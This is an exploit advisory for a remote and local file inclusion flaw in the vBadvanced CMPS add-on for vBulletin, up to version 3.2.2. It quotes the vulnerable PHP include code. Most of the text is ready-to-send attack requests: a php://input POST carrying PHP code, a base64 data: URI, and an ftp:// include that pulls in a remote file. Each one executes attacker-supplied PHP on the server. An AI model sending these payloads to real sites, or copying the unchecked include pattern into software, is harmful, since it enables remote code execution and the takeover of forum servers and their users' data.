# Exploit Title: vBadvanced CMPS <= v3.2.2 [RFI/LFI]
# Date: 25.01.2012
# Author: PacketiK email: packeto[dog]mail[dot]ru icq: 555555555 and Ulitochka =P
# Software Link: http://www.vbadvanced.com/
# Version: v3.2.2

#Requirements:
register_globals = on

file: vba_cmps_include_bottom.php vuln_code:
// Process PHP file pages here to avoid having to globalize variables
if ($pages['type'] == 'php_file' AND $vba_cusmodid)
{
ob_start();
require($pages['template']);
$home[$vba_cusmodid]['content'] = ob_get_contents();
ob_end_clean();
}

Mini_exploits:
 need: allow_url_include = On
POST http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=php://input HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

<?php phpinfo();ob_end_flush();exit;?>

Or

http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=

Or

http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt